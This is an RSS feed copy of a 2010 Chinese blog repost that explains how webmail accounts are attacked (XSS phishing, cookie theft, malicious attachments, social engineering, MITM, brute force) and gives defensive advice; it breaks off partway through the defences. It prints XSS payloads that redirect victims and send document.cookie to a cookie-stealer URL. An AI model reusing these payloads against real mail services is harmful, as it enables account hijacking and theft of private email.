<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>秋天博客，零点空间firefox</title>
	<atom:link href="http://www.cfresh.net/tag/firefox/feed" rel="self" type="application/rss+xml" />
	<link>http://www.cfresh.net</link>
	<description>网络技术_外贸知识_网络安全博客_外贸博客</description>
	<lastBuildDate>Thu, 09 Sep 2010 06:45:26 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>账号安全&#8211;预防身边的邮箱间谍</title>
		<link>http://www.cfresh.net/pc-tech/820</link>
		<comments>http://www.cfresh.net/pc-tech/820#comments</comments>
		<pubDate>Thu, 15 Jul 2010 02:50:15 +0000</pubDate>
		<dc:creator>秋天</dc:creator>
				<category><![CDATA[计算机应用]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[Gmail]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Twitter]]></category>
		<category><![CDATA[安全防护]]></category>
		<category><![CDATA[电邮(E-mail)]]></category>

		<guid isPermaLink="false">http://www.cfresh.net/?p=820</guid>
		<description><![CDATA[        屏幕前的你有没有遇到过邮箱失窃、邮件离奇失踪等事件？看完了这篇文章你可能会有一个更好的了解。        文章发表于可能吧，原作者：bizlai，发表时间：2010.4.21，文中所提及的一些时效内容同指，原文地址在此。        PS：可能吧遭封杀是都知道的事情，刚才秋天用架设在GAE上的代理访问可能吧时访问失败，而且在随后的若干秒内GAE代理都不能访问，换言之如果访问可能吧那么代理也将受到牵连。 ===========================我是性感的分割线===========================        如果说中国走在网络战争的前沿，你可能觉得胡扯。发动网络战争并不复杂，一般有三种类型：攻击基础设施、窃取机密数据、瘫痪网络服务。而本文，将重点谈及中国窃取机密数据的邮箱情报攻击，几乎从来没有哪个国家能像中国因维稳不惜任何代价而秘密地监听国内外的敏感人士。        对于电子邮箱攻击，你注意到国外媒体批露的中国攻击事件与日俱增，如本月9号，纽约时报记者声称他们的邮箱被攻击，而Twitter上的敏感人士开始越来越多的抱怨。你可能会质疑，有何事实数据可证明他们的邮箱确被攻击？这是一个好问题，因为他们无法跟踪攻击来源与防御被攻击，那么，常见的攻击手法是怎样的？我们如何跟踪攻击来源？又如何防御邮箱间谍的攻击？   一、你是局外人，还是受害者？        1月，Google向中国提出没有审查机制的G.cn，并声称有人试图入侵中国维权人士的Gmail，14日，McAfee就IE 0day的分析，将此次大规模的窃取机密数据（知识产权）攻击称为极光行动。尽管Google事件余波已去，我想说的是：极光行动为什么没有攻击国内邮箱？——显然！国内的邮箱具有过滤审查机制，这可以解释你的邮箱为何会丢信，更重要的是，一纸红头文件可未经用户许可泄露邮件数据，若有不从，以涉黄之名拔网线威胁。        普通的用户会这样认为：我不是敏感人士，我不会遭到电邮攻击。这样的想法很美好，让我们谈谈&#8221;话语权&#8220;吧。在三皇五帝的古代，骂皇帝是要砍头，而40年代末的建国期，是红色的革命语，时间回溯现在的极权主义国家，一切已然不一样了，尽管今天的新闻媒体仍在中宣部的约束之下，但互联网是一次革命，这个开放的网络空间，人人都是媒体，可在Twitter报导新闻，可用Wordpress发出声音，意识形态的大军是无法击溃互联网。        你会不会遭到电邮攻击？与你是不是敏感人士无关，而是视乎你在网络空间的声音、行为，以及现实生活中身份有关系。也不能说所有的电邮攻击都与政府脱不了干系，更有那些充满好奇心、乐于恶作剧的骇客。 二、攻击手法        你的Yahoo邮箱没有点击任何链接，但攻击者无需密码便控制住你的邮箱，这是什么回事？你的Gmail密码相当复杂，但为何收到密码重置的邮件？你登陆网易邮箱，点开邮件即重定向登陆入口，但网址却是真实的，这是为何？最后，来自国外越来越多的电邮失窃的新闻越来越多，你仍质疑中国没有能力侵入他国政要邮箱账户？ 1、XSS钓鱼        这种攻击仍是目前最行之有效的方法，除了Gmail目前不存在XSS漏洞外，其它的Yahoo、Hotmail、网易、腾讯、搜狐、新浪等都存在XSS漏洞。XSS漏洞是啥？它的全称是Cross-site scripting，即跨站攻击，存在此漏洞的网站，能够被恶意攻击者劫持，它还派生了XSRF等等形式的利用，可谓Web木马。        08年，国内的邮箱都存在HTML标签跨站，漏洞都很弱智，比如&#60;img src=javascript:alert()&#62;插在邮件标题、邮件内容、邮件附件处即可弹出一个可爱的alert。接下来，进步一点了，还是以HTML标签为主，搞个数据包工具看哪个变量没过滤、以及编码转换。09年，又升级了，主要是国外的邮箱Gmail、Yahoo、Hotmail改以语法过滤，能利用的是CSS标签跨站，Gmail非常狠，除了早期存在Google Docs附件跨站攻击，基本把恶意代码过滤得惨不忍睹。Yahoo在09年亦漏洞不断，但很负责，隔三差五地不断升级，而Hotmail令人失望，居然1day过了一年都不补。        腾讯圈了一批牛人，忘记是Ph4nt0m还是80sec的，比其它的网易、搜狐、新浪的邮箱安全性好一点，搜狐与新浪最烂，透露一下，它们其中一个仍存在字符集的跨站漏洞。那么，XSS攻击到底是怎样的形式呢？用一个08年截获的新浪的HTML标签XSS漏洞说明，此漏洞是失效了，这年头基本没人直接公开0day，都养家糊口来着。 &#60;INPUT TYPE=&#8221;IMAGE&#8221; SRC=&#8221;jav ascript:x7s=’var Then=new Date();Then.setTime(Then.getTime()+7200*1000);if(document.cookie. indexOf(\’Cookie1=\’) == -1){document.cookie=\’Cookie1=RAY;expires=\’+Then.toGMTString();window.parent.location.href=\’http://www.google.com/sina/index.php?url=\’+location.href+\’&#38;c=\’+document.cookie.replace(/&#38;/g,\’xxx\’);}’;eval(x7s)&#8221;);&#8221;&#62;        此漏洞的形成在于新浪邮箱没有过滤空格，即过滤了javascript，但稍变形为jav ascript，便使得其后的恶意代码得以执行。这段代码有两个功能，获取Cookie并延长有效时间，并用父窗口windows.parent.location重定向至钓鱼网站。完整的攻击流程是，将上述XSS代码插入至邮件内容，以HTML模式发送邮件至受害者邮箱，受害者点开邮件时，会迅速转向sina钓鱼网站，而转向过程中，因采用parent，转向时，网址不会有变化，即不会显示钓鱼网址，而受害者在钓鱼网站输入密码提交之，钓鱼网站截取密码再转回真实的邮箱，由于控制了Cookie，受害者因怀疑会再次点开那封攻击邮件，但并不会再次跳转，这令受害者产生一种错觉，它以为邮箱仍是安全的。 2、窃取Cookie        你可以理解为窃取会话。你有过很多这样的经历，使用账户登陆某个网站，如Youku.com，关闭浏览器，再次打开youku.com，则不需要输入密码，这便是Cookie的作用。为什么会有Cookie呢？由于Http是无状态协议，为了在各个会话传递信息，因而需要Cookie或Session来标记访客者的状态，这里的Session是浏览器的Cookie里带了一个Token来标记，而服务器取得Token检查合性后便把服务器上存储的对应状态和浏览器绑定。总的意思就是：我只要窃取你的Cookie并保持了Session不过期，便可无须密码访问你的电子邮箱内容。        如果你要查看自己的Cookie，给Firefox装个HttpFox扩展即可，如下图。          窃取Cookie很简单，可将上面的Javascript稍加改装即可：&#60;INPUT TYPE=&#8221;IMAGE&#8221; SRC=&#8221;jav ascript:document.location=’http://www.google.com/cookie/stealer.php?cookie=’+document.cookie;&#8221;&#62;，然后在stealer.php写个保存接收的Cookie记录的代码即可，如果你想让Session不过期，自己写个工具搞惦，每隔30秒请求一次目的页面。09年，Yahoo就被一帮人折腾了很多邮箱，不知道修复了没有，国内几个邮箱也能被利用。 3、恶意软件        即木马、病毒、后门、间谍、键盘记录器……这些软件，最常见算是doc、pdf病毒了，好好的一个文档，挟带了木马，双击一打开，你就完了。最容易受到攻击的是西藏人士、维权人士，然而，我不得不承认，这是一种非常阴险的手段，因为这毫无任何技术含量。这个攻击流程是，xxx部门获取经费收购或买断木马软件、捆绑软件，一般外包给中国公司，然后这些公司的报价奇高，各省xxx部门买了后，按照说明书配置木马上线，再用捆绑工具与可信的文件捆在一起，再用Google挑目标，比如找到abc.com网站，将该网站电子邮箱地址都整理出来，再用邮箱批量群发器不管三七十一把这些病毒通通发过去，再泡上一杯茶盯着木马软件等着目标上线。        这种没有采用鱼叉式攻击所导致的后果是，买的木马软件、捆绑软件很快就无效了，因为一顿乱发，被安全软件给盯上或用户举报查杀掉了，这个例证就是最近的IE 0day及PDF 0day很快曝光，估计这前后都不到一年。而在前文，尽管中国没有比美国更好的网络战争实力，但是不差钱，他们不需要关注技术细节，只需要知道谁有0day，谁会挖掘0day，然后招安，买断一堆的0day，比如Discuz!、Wordpress、Firefox漏洞，照着教程去攻击。        那么如何防御这种恶意附件的攻击？当你再次在邮箱看见一堆的PDF、DOC、HTM压缩包时，简单的方法是，下载后不要打开，直接上传至Google Docs，要是显示一片空白或无关的内容，不管三七二十一提交到VirusTotal网站上。 4、社会工程学        这个方法很简单，先跟你套近乎下，然后东问问西问问获得碎片信息，基本就是掘地三层把目标的信息全收集起来，完了后，评估一下你的弱点在哪里，再从弱点入手，这种攻击通常是雇佣了职业黑客来完成，因为过程比较复杂。举例子，攻击者有目标的邮箱，然后放到Google搜索，看目标注册了哪些网站，把这些网站整理，逐个把这些网站入侵了并下载数据库，从中找到目标的网站密码，再用网站密码试邮箱密码，要是目标只用一个密码，那么他的邮箱就完了。        总体上来说，你在网络上的信息越少，便能够降低被入侵的威胁。但事实并不情人愿，Web2.0的社交网络流行，你注册了Twitter，天天叽叽喳喳，一不小心把家世、住址、约会全都泄露了，你注册了豆瓣，天天左看右瞧还加了攻击者为好友，结果，他就知道你上网习惯与兴趣爱好，然后再用策略和你聊的特别欢，某一天，他跟你讲：我找到一个非常牛B的电影了，你在Verycd下载瞧瞧。你一看，还真不错，真是你喜欢的。然后他又讲，能不能帮我登陆下Gmail下载个文件看看是啥内容？我网速比较慢，我发你登陆密码。你听了，这小忙是得帮的，马上速度登陆对方的Gmail下载了压缩包，结果打开压缩包的文档发现啥都没，到了第二天，你就很神奇地发现，哦哦~我的豆瓣、twitter全都登陆不了……        社会工程学攻击永不过时，因为人人都有被利用的心理弱点，不管是好心、私心、同情心啥的，都无法避免这种攻击。不过，这项攻击最大的缺点是，很耗时间，短则几天，长则几月。这项攻击在敏感人士的社区很常见，如Forum、Google Groups等，那些攻击者最常见的手法盗用可信账户发送病毒附件。 5、MIT中间人攻击        以ARP攻击为例，A访问mail.sina.com，但攻击者B通过ARP劫持，可以使得你访问虚假的新浪钓鱼网站，而非真实的新浪。这种劫持通信的手法可适合不同的场合，如劫持ADSL线路，这需要红头文件请本地电信局协助的，然后修改你的数据包返回假的数据包，举例而言，你想从QQ官方下载QQ程序，攻击者修改数据包把QQ程序的下载地址改成木马地址，结果你就可以下载个木马回去了。如果你的通信是明文，没有采用SSL，攻击者可以直接看到你密码。不过，我不太肯定，Gmail虽然采用了SSL，但用户名与密码却在网址中出现，有公司宣称能解开SSL，我现在仍然是半信半疑。 [...]]]></description>
			<content:encoded><![CDATA[<p>        屏幕前的你有没有遇到过邮箱失窃、邮件离奇失踪等事件？看完了这篇文章你可能会有一个更好的了解。<br />
       文章发表于<a rel="nofollow" href="http://www.kenengba.com" target="_blank">可能吧</a>，原作者：bizlai，发表时间：2010.4.21，文中所提及的一些时效内容同指，原文地址<a rel="nofollow" href="http://proxysun.appspot.com/o?o=6c6d74682e323738322f74736f702f6d6f632e6162676e656e656b2e7777772f2f3a70747468" target="_blank">在此</a>。<br />
       PS：可能吧遭封杀是都知道的事情，刚才秋天用架设在GAE上的<a href="http://flow-proxy.appspot.com/" target="_blank">代理</a>访问可能吧时访问失败，而且在随后的若干秒内<a href="http://flow-proxy.appspot.com/" target="_blank">GAE代理</a>都不能访问，换言之如果访问可能吧那么代理也将受到牵连。</p>
<p><br class="spacer_" /></p>
<p>===========================<span style="color: #0000ff;">我是性感的分割线</span>===========================</p>
<p>       如果说中国走在网络战争的前沿，你可能觉得胡扯。发动网络战争并不复杂，一般有三种类型：<strong>攻击基础设施</strong>、<strong>窃取机密数据</strong>、<strong>瘫痪网络服务</strong>。而本文，将重点谈及中国窃取机密数据的邮箱情报攻击，几乎从来没有哪个国家能像中国因维稳不惜任何代价而秘密地监听国内外的敏感人士。</p>
<p>       对于电子邮箱攻击，你注意到国外媒体批露的中国攻击事件与日俱增，如本月9号，<a rel="nofollow" href="http://proxysun.appspot.com/o?o=6c6c613d6465746e6177656761703f6c6d74682e73626f63616a31312f7765697665726e696b6565772f31312f34302f303130322f6d6f632e73656d6974796e2e7777772f2f3a70747468" target="_blank">纽约时报记者声称他们的邮箱被攻击</a>，<a rel="nofollow" href="http://proxysun.appspot.com/o?o=3142254541253745254541253238253945252b4342253142253945253339253239253945253d713f6863726165732f6d6f632e726574746977742e6863726165732f2f3a70747468" target="_blank">而Twitter上的敏感人士开始越来越多的抱怨</a>。你可能会质疑，有何事实数据可证明他们的邮箱确被攻击？这是一个好问题，因为他们无法跟踪攻击来源与防御被攻击，那么，常见的攻击手法是怎样的？我们如何跟踪攻击来源？又如何防御邮箱间谍的攻击？</p>
<p style="text-align: center;"><img class="aligncenter" src="/wp-content/uploads/2010/07/mail-security-1.png" alt="" width="600" height="369" /></p>
<p> <span id="more-820"></span></p>
<p><strong><span style="font-size: medium;">一、你是局外人，还是受害者？</span></strong></p>
<p>       1月，<a rel="nofollow" href="http://proxysun.appspot.com/o?o=6c6d74682e383432322f74736f702f6d6f632e6162676e656e656b2e7777772f2f3a7370747468" target="_blank">Google向中国提出没有审查机制的G.cn</a>，并声称有人试图入侵中国维权人士的Gmail，14日，McAfee就IE 0day的分析，将此次大规模的窃取机密数据（知识产权）攻击称为极光行动。尽管Google事件余波已去，我想说的是：极光行动为什么没有攻击国内邮箱？——显然！国内的邮箱具有过滤审查机制，<a rel="nofollow" href="http://proxysun.appspot.com/o?o=6c6d74682e3138372f74736f702f6d6f632e6162676e656e656b2e7777772f2f3a7370747468" target="_blank">这可以解释你的邮箱为何会丢信</a>，更重要的是，一纸<a rel="nofollow" href="http://proxysun.appspot.com/o?o=3642254242253445253738253639253645253442253441253545253241254142253745252f6e632d687a2f67726f2e6169646570696b69772e687a2f2f3a70747468" target="_blank">红头文件</a>可未经用户许可泄露邮件数据，若有不从，以<a rel="nofollow" href="http://proxysun.appspot.com/o?o=6c6d74682e353830322f74736f702f6d6f632e6162676e656e656b2e7777772f2f3a7370747468" target="_blank">涉黄之名</a>拔网线威胁。</p>
<p>       普通的用户会这样认为：我不是敏感人士，我不会遭到电邮攻击。这样的想法很美好，让我们谈谈&#8221;<a rel="nofollow" href="http://proxysun.appspot.com/o?o=3231383d703f2f74656e2e676e6f686375622e7777772f2f3a70747468" target="_blank">话语权</a>&#8220;吧。在三皇五帝的古代，骂皇帝是要砍头，而40年代末的建国期，是红色的革命语，时间回溯现在的极权主义国家，一切已然不一样了，尽管今天的新闻媒体仍在中宣部的约束之下，但互联网是一次革命，这个开放的网络空间，人人都是媒体，可在Twitter报导新闻，可用Wordpress发出声音，意识形态的大军是无法击溃互联网。</p>
<p>       你会不会遭到电邮攻击？与你是不是敏感人士无关，而是视乎你在网络空间的声音、行为，以及现实生活中身份有关系。也不能说所有的电邮攻击都与政府脱不了干系，更有那些充满好奇心、乐于恶作剧的骇客。</p>
<p><br class="spacer_" /></p>
<p><strong><span style="font-size: medium;">二、攻击手法</span></strong></p>
<p>       你的Yahoo邮箱没有点击任何链接，但攻击者无需密码便控制住你的邮箱，这是什么回事？你的Gmail密码相当复杂，但为何收到密码重置的邮件？你登陆网易邮箱，点开邮件即重定向登陆入口，但网址却是真实的，这是为何？最后，<a rel="nofollow" href="http://proxysun.appspot.com/o?o=75327079727338786675773a3233313430303638383332373830343136323330303d7863263241253442253745254339253039253645252b656c676f6f473d476e7462263639254638253545253338254141253745252b4442254239253545254441253842253445253d7126303d65736374736f6f62266b636d4d755a6c6638716b5f34786d4a7a55554f5a35654d2d4f7541394d786f3164463765664770486e7369487673474b38566f726f5a504e5565312d53324343485f3272325f783049393530314551316a52594c6b4b464841753377684570455665616333773133574f38556a666158676d794c45413d776b6461263b6363636363633332253a5649443b6238613135353332253a434c563b313a504c3b30333a484c3b6669672e6d735f6f676f6c5f6863726165735f6d6f747375632f736f676f6c2f736567616d692f4e432d687a2f6c746e692f6d6f632e656c676f6f672e7777772f2f3a707474683a4c3b4242353225373935322539453532253042353225363935322536453532253438353225413935322537453532253639353225344135322535453532253939353225324135322535453532253a58433b7466656c3a48413b33313a4449524f463d666f6326706f6f632d656c676f6f673d746e65696c63264e432d687a3d6c683f6d6f747375632f6d6f632e656c676f6f672e7777772f2f3a70747468" target="_blank">来自国外越来越多的电邮失窃的新闻越来越多</a>，你仍质疑中国没有能力侵入他国政要邮箱账户？</p>
<p><strong><span style="color: #0000ff;">1、XSS钓鱼</span></strong></p>
<p>       这种攻击仍是目前最行之有效的方法，除了Gmail目前不存在XSS漏洞外，其它的Yahoo、Hotmail、网易、腾讯、搜狐、新浪等都存在XSS漏洞。XSS漏洞是啥？它的全称是Cross-site scripting，即跨站攻击，存在此漏洞的网站，能够被恶意攻击者劫持，它还派生了XSRF等等形式的利用，可谓Web木马。</p>
<p>       08年，国内的邮箱都存在HTML标签跨站，漏洞都很弱智，比如&lt;img src=javascript:alert()&gt;插在邮件标题、邮件内容、邮件附件处即可弹出一个可爱的alert。接下来，进步一点了，还是以HTML标签为主，搞个数据包工具看哪个变量没过滤、以及编码转换。09年，又升级了，主要是国外的邮箱Gmail、Yahoo、Hotmail改以语法过滤，能利用的是CSS标签跨站，Gmail非常狠，除了早期存在Google Docs附件跨站攻击，基本把恶意代码过滤得惨不忍睹。Yahoo在09年亦漏洞不断，但很负责，隔三差五地不断升级，而Hotmail令人失望，居然1day过了一年都不补。</p>
<p>       腾讯圈了一批牛人，忘记是Ph4nt0m还是80sec的，比其它的网易、搜狐、新浪的邮箱安全性好一点，搜狐与新浪最烂，透露一下，它们其中一个仍存在字符集的跨站漏洞。那么，XSS攻击到底是怎样的形式呢？用一个08年截获的新浪的HTML标签XSS漏洞说明，此漏洞是失效了，这年头基本没人直接公开0day，都养家糊口来着。</p>
<blockquote><p>&lt;INPUT TYPE=&#8221;IMAGE&#8221; SRC=&#8221;jav ascript:x7s=’var Then=new Date();Then.setTime(Then.getTime()+7200*1000);if(document.cookie. indexOf(\’Cookie1=\’) == -1){document.cookie=\’Cookie1=RAY;expires=\’+Then.toGMTString();window.parent.location.href=\’http://www.google.com/sina/index.php?url=\’+location.href+\’&amp;c=\’+document.cookie.replace(/&amp;/g,\’xxx\’);}’;eval(x7s)&#8221;);&#8221;&gt;</p>
</blockquote>
<p>       此漏洞的形成在于新浪邮箱没有过滤空格，即过滤了javascript，但稍变形为jav ascript，便使得其后的恶意代码得以执行。这段代码有两个功能，获取Cookie并延长有效时间，并用父窗口windows.parent.location重定向至钓鱼网站。完整的攻击流程是，将上述XSS代码插入至邮件内容，以HTML模式发送邮件至受害者邮箱，受害者点开邮件时，会迅速转向sina钓鱼网站，而转向过程中，因采用parent，转向时，网址不会有变化，即不会显示钓鱼网址，而受害者在钓鱼网站输入密码提交之，钓鱼网站截取密码再转回真实的邮箱，由于控制了Cookie，受害者因怀疑会再次点开那封攻击邮件，但并不会再次跳转，这令受害者产生一种错觉，它以为邮箱仍是安全的。</p>
<p><strong><span style="color: #0000ff;">2、窃取Cookie</span></strong></p>
<p>       你可以理解为窃取会话。你有过很多这样的经历，使用账户登陆某个网站，如Youku.com，关闭浏览器，再次打开youku.com，则不需要输入密码，这便是Cookie的作用。为什么会有Cookie呢？由于Http是无状态协议，为了在各个会话传递信息，因而需要Cookie或Session来标记访客者的状态，这里的Session是浏览器的Cookie里带了一个Token来标记，而服务器取得Token检查合性后便把服务器上存储的对应状态和浏览器绑定。总的意思就是：我只要窃取你的Cookie并保持了Session不过期，便可无须密码访问你的电子邮箱内容。</p>
<p>       如果你要查看自己的Cookie，给Firefox装个HttpFox扩展即可，如下图。</p>
<p style="text-align: center;"> <img class="aligncenter" src="/wp-content/uploads/2010/07/httpfox-entention.png" alt="HttpFox扩展" width="505" height="332" /></p>
<p>       窃取Cookie很简单，可将上面的Javascript稍加改装即可：&lt;INPUT TYPE=&#8221;IMAGE&#8221; SRC=&#8221;jav ascript:document.location=’http://www.google.com/cookie/stealer.php?cookie=’+document.cookie;&#8221;&gt;，然后在stealer.php写个保存接收的Cookie记录的代码即可，如果你想让Session不过期，自己写个工具搞惦，每隔30秒请求一次目的页面。09年，Yahoo就被一帮人折腾了很多邮箱，不知道修复了没有，国内几个邮箱也能被利用。</p>
<p><strong><span style="color: #0000ff;">3、恶意软件</span></strong></p>
<p>       即木马、病毒、后门、间谍、键盘记录器……这些软件，最常见算是doc、pdf病毒了，好好的一个文档，挟带了木马，双击一打开，你就完了。最容易受到攻击的是西藏人士、维权人士，然而，我不得不承认，这是一种非常阴险的手段，因为这毫无任何技术含量。这个攻击流程是，xxx部门获取经费收购或买断木马软件、捆绑软件，一般外包给中国公司，然后这些公司的报价奇高，各省xxx部门买了后，按照说明书配置木马上线，再用捆绑工具与可信的文件捆在一起，再用Google挑目标，比如找到abc.com网站，将该网站电子邮箱地址都整理出来，再用邮箱批量群发器不管三七十一把这些病毒通通发过去，再泡上一杯茶盯着木马软件等着目标上线。</p>
<p>       这种没有采用鱼叉式攻击所导致的后果是，买的木马软件、捆绑软件很快就无效了，因为一顿乱发，被安全软件给盯上或用户举报查杀掉了，这个例证就是<a rel="nofollow" href="http://proxysun.appspot.com/o?o=6c6d74682e3930353631322f35313130303130322f612f74656e2e6e6473632e7377656e2f2f3a70747468" target="_blank">最近的IE 0day及PDF 0day很快曝光</a>，估计这前后都不到一年。而在前文，尽管中国没有比美国更好的网络战争实力，但是不差钱，他们不需要关注技术细节，只需要知道谁有0day，谁会挖掘0day，然后招安，买断一堆的0day，比如Discuz!、Wordpress、Firefox漏洞，照着教程去攻击。</p>
<p>       那么如何防御这种恶意附件的攻击？当你再次在邮箱看见一堆的PDF、DOC、HTM压缩包时，简单的方法是，下载后不要打开，直接上传至Google Docs，要是显示一片空白或无关的内容，不管三七二十一提交到<a rel="nofollow" href="http://www.virustotal.com/zh-cn/" target="_blank">VirusTotal</a>网站上。</p>
<p><strong><span style="color: #0000ff;">4、社会工程学</span></strong></p>
<p>       这个方法很简单，先跟你套近乎下，然后东问问西问问获得碎片信息，基本就是掘地三层把目标的信息全收集起来，完了后，评估一下你的弱点在哪里，再从弱点入手，这种攻击通常是雇佣了职业黑客来完成，因为过程比较复杂。举例子，攻击者有目标的邮箱，然后放到Google搜索，看目标注册了哪些网站，把这些网站整理，逐个把这些网站入侵了并下载数据库，从中找到目标的网站密码，再用网站密码试邮箱密码，要是目标只用一个密码，那么他的邮箱就完了。</p>
<p>       总体上来说，你在网络上的信息越少，便能够降低被入侵的威胁。但事实并不情人愿，Web2.0的社交网络流行，你注册了Twitter，天天叽叽喳喳，一不小心把家世、住址、约会全都泄露了，你注册了豆瓣，天天左看右瞧还加了攻击者为好友，结果，他就知道你上网习惯与兴趣爱好，然后再用策略和你聊的特别欢，某一天，他跟你讲：我找到一个非常牛B的电影了，你在Verycd下载瞧瞧。你一看，还真不错，真是你喜欢的。然后他又讲，能不能帮我登陆下Gmail下载个文件看看是啥内容？我网速比较慢，我发你登陆密码。你听了，这小忙是得帮的，马上速度登陆对方的Gmail下载了压缩包，结果打开压缩包的文档发现啥都没，到了第二天，你就很神奇地发现，哦哦~我的豆瓣、twitter全都登陆不了……</p>
<p>       社会工程学攻击永不过时，因为人人都有被利用的心理弱点，不管是好心、私心、同情心啥的，都无法避免这种攻击。不过，这项攻击最大的缺点是，很耗时间，短则几天，长则几月。这项攻击在敏感人士的社区很常见，如Forum、Google Groups等，那些攻击者最常见的手法盗用可信账户发送病毒附件。</p>
<p><strong><span style="color: #0000ff;">5、MIT中间人攻击</span></strong></p>
<p>       以ARP攻击为例，A访问mail.sina.com，但攻击者B通过ARP劫持，可以使得你访问虚假的新浪钓鱼网站，而非真实的新浪。这种劫持通信的手法可适合不同的场合，如劫持ADSL线路，这需要红头文件请本地电信局协助的，然后修改你的数据包返回假的数据包，举例而言，你想从QQ官方下载QQ程序，攻击者修改数据包把QQ程序的下载地址改成木马地址，结果你就可以下载个木马回去了。如果你的通信是明文，没有采用SSL，攻击者可以直接看到你密码。不过，我不太肯定，Gmail虽然采用了SSL，但用户名与密码却在网址中出现，有公司宣称能解开SSL，我现在仍然是半信半疑。</p>
<p>       另外一种是hosts文件劫持，典型的例子是，某个家伙在Twitter.com说：无法访问youtube.com？Picasaweb？很简单，修改hosts文件即可马上访问。你一听，哇，这么好，赶紧用记事本打开hosts文件，把对方提供的映射地址粘贴进去，再重新打开youtube.com，哇，真神奇，打开了~~聪明的看客接下来知道会发生啥了。</p>
<p>       对于ADSL线路劫持的手法，这种攻击也是行之有效的。另外，我们也得对某些代理软件保持警惕，天知道那些免费的socks5、vpn会干出令人震惊的事吗？</p>
<p><strong><span style="color: #0000ff;">6、暴力破解</span></strong></p>
<p>       有三种，web穷举、smtp穷举、云穷举。在多数的情况下，前两种效率低下，且限制诸多，以Web Gmail为例，它有CAPTCHA限制、重复次数的限制，不过，我倒是碰到过一个Python版的穷举工具，但速度很慢。至于smtp，如果服务器做了限制的话，比如现在网易对<a rel="nofollow" href="http://www.netxeyes.com/main.html" target="_blank">溯雪</a>暴力破解工具是免疫的。云穷举，就我目前所知，我想这是最有效率的破解方法，<a rel="nofollow" href="http://proxysun.appspot.com/o?o=6c6d74682e64756f6c632d6e692d7364726f77737361702d676e696b636172632f30312f393030322f74656e2e796d6568636c616369727463656c652e7377656e2f2f3a70747468" target="_blank">已有安全专家Electric Alchemy利用亚马逊云服务Amazon Ec2运行Elcomsoft工具暴力破解PGP ZIP档案的例子</a>。凭借云计算的超级计算机，以及一个分布式邮箱密码破解工具，暴力破解的速度将更快速。不过，这并不切实际，因为破解的成本太高了，需要很多米米。</p>
<p>       暴力破解，这个古老的方法在目前只能针对极少的主流电子邮箱，尽管如此，但它对那些自架设的电子邮局仍然有效，因为它们没有CAPTCHA、重复尝试次数、服务器资源等限制。总的来说，暴力破解对本地的加密文件破解比较有效率，但对网络邮箱账户的破解尚不能达到30%的成功率。</p>
<p><strong><span style="color: #0000ff;">7、浏览器恶意脚本<br />
</span></strong>       上过流氓软件的当吧？一旦打开IE，主页被锁定只能访问某个流氓的网站，嗯，没错，浏览器的脚本也能起到钓鱼攻击之用。比如IE的BHO(Browser Helper Object)劫持、Chrome、Firefox扩展钓鱼。就目前而言Chrome、Firefox的扩展钓鱼并不怎么流行，这比较麻烦，攻击者需写一个看似合法可信的扩展，并植入后门，还需要方法让目标安装，这费力不讨好，但BHO容易多了，可以隐秘地安装而不会有提示。要防御这种攻击很简单，检视你的Firefox、chrome是否有陌生的扩展、插件，不要在第三方的网站安装扩展。</p>
<p><strong><span style="color: #0000ff;">8、内嵌登陆表单</span></strong></p>
<p>       这是社会工程学攻击的一种变形。当你打开某邮件，其内容部分嵌入了登陆表单，具体就是，你会看到一个要求你输入用户名、密码的登陆框。恰好RFA的新闻<a rel="nofollow" href="http://proxysun.appspot.com/o?o=726574746977743d6d756964656d5f6d74752664656566726574746977743d656372756f735f6d74753f6c6d74682e30343030303130313032303234302d676e616978756f792f6f61646f616269617461792f6e697261646e616d2f67726f2e6166722e7777772f2f3a70747468" target="_blank">《维权人士邮箱和推特遭窃取、攻击》</a>公布一张攻击实例图片，见下图。</p>
<p><br class="spacer_" /></p>
<p style="text-align: center;"><img class="aligncenter" src="/wp-content/uploads/2010/07/mail-security-2.jpg" alt="Gmail账号即将被封锁" width="306" height="353" /></p>
<p>       如果你的Gmail收到上述的威胁恫吓邮件，不要担心，请在邮件的右侧点击下拉菜单，选择“这是网络欺诈”，而Gmail将会稍后封锁此攻击者。普通的用户不要误以为这是Gmail的安全漏洞，最简单的方法，选中邮件内容查看源代码，你可以发现并不存在恶意的Javascript脚本，而是HTML标签，你在源代码找到Action位置，将其后的钓鱼网站向Google举报即可。</p>
<p>       其它的Gmail用户不需要担心，这种内嵌表单钓鱼方式是通杀Gmail、Hotmail、Yahoo、网易、腾讯、搜狐的邮箱，由于不存在恶意的Javascript，可称之良性HTML标签利用。看到这类威胁恫吓邮件，一是举报钓鱼邮件、钓鱼网址，二是删除该邮件，三是提醒你的朋友警惕。</p>
<p><br class="spacer_" /></p>
<p><strong><span style="font-size: medium;">三、防御</span></strong></p>
<p>       安全不能100%保证，只能最大限度地降低威胁，更来源于用户的安全意识。</p>
<p><strong><span style="color: #0000ff;">1、防御XSS<br />
</span></strong>       如果你使用的Firefox浏览器，可安装<a rel="nofollow" href="http://noscript.net/getit" target="_blank">NoScript</a>扩展来屏蔽恶意的Javascript脚本。但你希望一劳永逸的话，非常简单，注册一个私人Google Groups，并设置Gmail的过滤器，所有邮件一律转发至Google Groups。但如果也不喜欢注册<a rel="nofollow" href="http:///groups.google.com.my/" target="_blank">Google Groups</a>，那么你可以再注册Yahoo、Hotmail邮箱，使用Yahoo收取Gmail，再用Hotmail收取Yahoo，在这过程中，特定的XSS代码会分崩离析。</p>
<p><strong><span style="color: #0000ff;">2、防御恶意软件</span></strong><br />
